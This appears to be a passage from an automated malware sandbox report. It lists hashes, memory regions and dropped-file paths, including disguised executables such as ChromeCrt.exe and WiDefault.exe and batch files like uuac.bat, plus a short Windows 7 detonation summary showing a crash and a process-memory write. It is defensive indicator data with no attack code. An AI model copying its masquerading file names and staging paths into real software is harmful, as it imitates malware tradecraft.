| MD5 | d78da0b1a407d02064e1a683e6a91515 |
| SHA1 | 46ce5b401087047c413ba6716231fae761c59d41 |
| SHA256 | dced05a96fc74f496c32f77c41afab079926c92b633ab623dbb4092c108c2233 |
| SHA512 | 6ae7197ccaf96286042e463865e445daa85bf6a7f0a02456bf17b7ae5290e99261d2247e934d4b5ce6fd87aa1680626f493852157799727bf46812853cea32ba |
memory/2332-81-0x0000000005580000-0x0000000005590000-memory.dmp
memory/2332-84-0x0000000074D30000-0x00000000754E0000-memory.dmp
memory/2512-85-0x0000000074D30000-0x00000000754E0000-memory.dmp
memory/2512-86-0x0000000004F60000-0x0000000004F70000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5119dccd6c6683851dd33e6a09ca8e27 |
| SHA1 | eeb5f3e46522462149c7ed93d288e62a6fd8790a |
| SHA256 | d6734c288d5a479bc91823c941cec3b46fcf113d303c50cb3aef6830bdcbb626 |
| SHA512 | cfeb51e802ba495cebf7d6888aeb9cdccde755bc10feb610ab629d658943a8f2c2f1f0aa97a7dc8e4ea3a3ca37b6444c3bcbb72331f652138bf40af5aeeb828e |
memory/2512-97-0x0000000004F60000-0x0000000004F70000-memory.dmp
memory/2512-100-0x0000000074D30000-0x00000000754E0000-memory.dmp
memory/3532-101-0x0000000074D30000-0x00000000754E0000-memory.dmp
memory/3532-102-0x0000000002760000-0x0000000002770000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 8dff0ea200abe0db68b89cd9ee373a86 |
| SHA1 | 543c8df3221e9f1b872e3dfcffc24f2d14a7ac0a |
| SHA256 | b7d40a4455dffbd410178887871eae4f9a8c11d50aeccdcf082836a529e04c7f |
| SHA512 | 621bee5e7950b4ae9a20ae6d2f3dced3b9c21d8835bce6feb8854a8a5e3e54571a2a9c8c894a06982f46ab572b78aa658ce6a8aad81ae257b7d814c088709c75 |
memory/3532-113-0x0000000002760000-0x0000000002770000-memory.dmp
memory/3532-116-0x0000000074D30000-0x00000000754E0000-memory.dmp
memory/1952-117-0x0000000074D30000-0x00000000754E0000-memory.dmp
memory/1952-118-0x0000000005300000-0x0000000005310000-memory.dmp
memory/1952-119-0x0000000005300000-0x0000000005310000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d8fe6f08f93bce59a32e1dd53220ed93 |
| SHA1 | 46ef4de2bde6a43f1526f87b3a2136f59fe386b0 |
| SHA256 | 43712035089e489ecf1ccfd1b20c259d97791cc37cf0aac9a966e107cc039f89 |
| SHA512 | fc0a366751b96a849fc533069bd3844cbbfe2156a933b527c5793f169527b1fb5d5a4ef48dea6969f3695e6eab7bc046b1d6f89492482bd99e97c9f42893308c |
memory/1952-130-0x0000000005300000-0x0000000005310000-memory.dmp
memory/1952-133-0x0000000074D30000-0x00000000754E0000-memory.dmp
C:\Users\Public\Music\RunNihaiersion.exe
| MD5 | 123bdf05b4b261644ff4579b8bd78806 |
| SHA1 | d6ce6069ba2faed71c5626daf8094a7ac921848b |
| SHA256 | 9736150b75ca7c0c89b7e0530a98c640b3ee8863b0b39a56a1d8ff9b114de631 |
| SHA512 | e734bd6455e83144ee78d9fe393fb85f968e960a5908a22bd1d884478ca79c5cbef6d0ea010d6dd575920e6931ad0be8ea02af5da46668b7287f00e75afd93b5 |
C:\Users\Public\Music\RunNihaiersion.exe
| MD5 | 123bdf05b4b261644ff4579b8bd78806 |
| SHA1 | d6ce6069ba2faed71c5626daf8094a7ac921848b |
| SHA256 | 9736150b75ca7c0c89b7e0530a98c640b3ee8863b0b39a56a1d8ff9b114de631 |
| SHA512 | e734bd6455e83144ee78d9fe393fb85f968e960a5908a22bd1d884478ca79c5cbef6d0ea010d6dd575920e6931ad0be8ea02af5da46668b7287f00e75afd93b5 |
memory/4632-137-0x0000000000E20000-0x0000000000E28000-memory.dmp
memory/4632-138-0x0000000074D30000-0x00000000754E0000-memory.dmp
C:\Users\Public\Music\bes.bat
| MD5 | 9947ba16f06abcff429e922c49790337 |
| SHA1 | bd24d00f50e0d63892fc641a1438551d577b6e50 |
| SHA256 | 8683fbcb2068bf7759e1b221e2dc660757e96e2a23ac9404a541ba82fb9c4a4f |
| SHA512 | 2a8ace440d7ab8a3ae6f02a84b5f7c81872d09946752ec02ac1a0fc64d9e1cfcb891c935f11394e395c748fb5b0f8a320f71dac25fa0c19a8a87e688af49cd11 |
memory/4632-141-0x0000000074D30000-0x00000000754E0000-memory.dmp
C:\Users\Public\Music\israil.exe
| MD5 | b65cd9956dfe1877c72ffe687fc632b4 |
| SHA1 | 86c1bc804f2394bb0b20fa7434257786eb72e5bf |
| SHA256 | 561d189fb1c2b89e27f0e4be57c4b16dbced1d1940712fed04adfc35d34b05a0 |
| SHA512 | fb2f44fa8821c9d5e048b74a17cdf2bd1a545e4c9c2af7a15ad50e53766c44e50d7dd1c805f0e88e7170f8ae43895977b96e6dec766225670a8e035cd421f4fd |
C:\Users\Public\Music\israil.exe
| MD5 | b65cd9956dfe1877c72ffe687fc632b4 |
| SHA1 | 86c1bc804f2394bb0b20fa7434257786eb72e5bf |
| SHA256 | 561d189fb1c2b89e27f0e4be57c4b16dbced1d1940712fed04adfc35d34b05a0 |
| SHA512 | fb2f44fa8821c9d5e048b74a17cdf2bd1a545e4c9c2af7a15ad50e53766c44e50d7dd1c805f0e88e7170f8ae43895977b96e6dec766225670a8e035cd421f4fd |
memory/448-145-0x0000000000370000-0x0000000000378000-memory.dmp
memory/448-146-0x0000000074D30000-0x00000000754E0000-memory.dmp
C:\Users\Public\Music\installer2.bat
| MD5 | 50b98ed3895545b2b72b28966cfa2b0d |
| SHA1 | bf98a58225c8ce199e48825624e793ee8e0ca3f8 |
| SHA256 | ac019bd8d7937f836b6039c3d0a33c8e75509fb0ab79ee41ec3171f0cb0e1591 |
| SHA512 | af1c1bb692280e89df2a92f6aedbb90d76e3017572723f1bcacd092ecfd07cb1b05ebb9eb4dc322628d0734f96c95cae0e360042162859e55af957009bf0acaa |
memory/448-149-0x0000000074D30000-0x00000000754E0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
C:\Users\Public\Music\RunihaiVersion.exe
C:\Users\Public\Music\es.bat
C:\Users\Public\Music\israil2.exe
C:\Users\Public\Music\uuac.bat
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\israil2.exe.log
C:\Users\Admin\AppData\Local\Temp\xx.exe
C:\Users\Admin\AppData\Local\Temp\dSu6WJb0QA.exe
C:\Users\Admin\AppData\Local\Temp\deFLhxlhO6.exe
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
C:\Users\Admin\AppData\Local\Temp\2MFBYnhJev.exe
C:\Users\Admin\AppData\Local\Temp\ljzWLt20Y4.exe
C:\Users\Admin\AppData\Local\Temp\n4vdGlPOcH.exe
C:\Users\Admin\AppData\Local\Temp\LcsJTY4jpV.exe
C:\Users\Admin\AppData\Local\Temp\6DLQBnKtiL.exe
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\n4vdGlPOcH.exe.log
C:\Users\Admin\AppData\Roaming\ChromeCrt.exe
C:\Users\Admin\AppData\Roaming\WiDefault.exe
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
C:\Users\Admin\AppData\Roaming\2WinDefault.exe
C:\Users\Admin\AppData\Roaming\OperaCrt.exe
C:\Users\Admin\AppData\Roaming\VisualStudioo.exe
Analysis: behavioral1
Detonation Overview
Submitted
2023-11-15 10:44
Reported
2023-11-15 10:46
Platform
win7-20231023-en
Max time kernel
118s
Max time network
124s
Command Line
Signatures
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\resources.exe |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2244 wrote to memory of 1308 | N/A | C:\Users\Admin\AppData\Local\Temp\resources.exe | C:\Windows\SysWOW64\WerFault.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\resources.exe
"C:\Users\Admin\AppData\Local\Temp\resources.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2244 -s 816
Network
Files
memory/2244-0-0x0000000001270000-0x0000000001286000-memory.dmp
memory/2244-1-0x0000000073F10000-0x00000000745FE000-memory.dmp
memory/2244-3-0x0000000073F10000-0x00000000745FE000-memory.dmp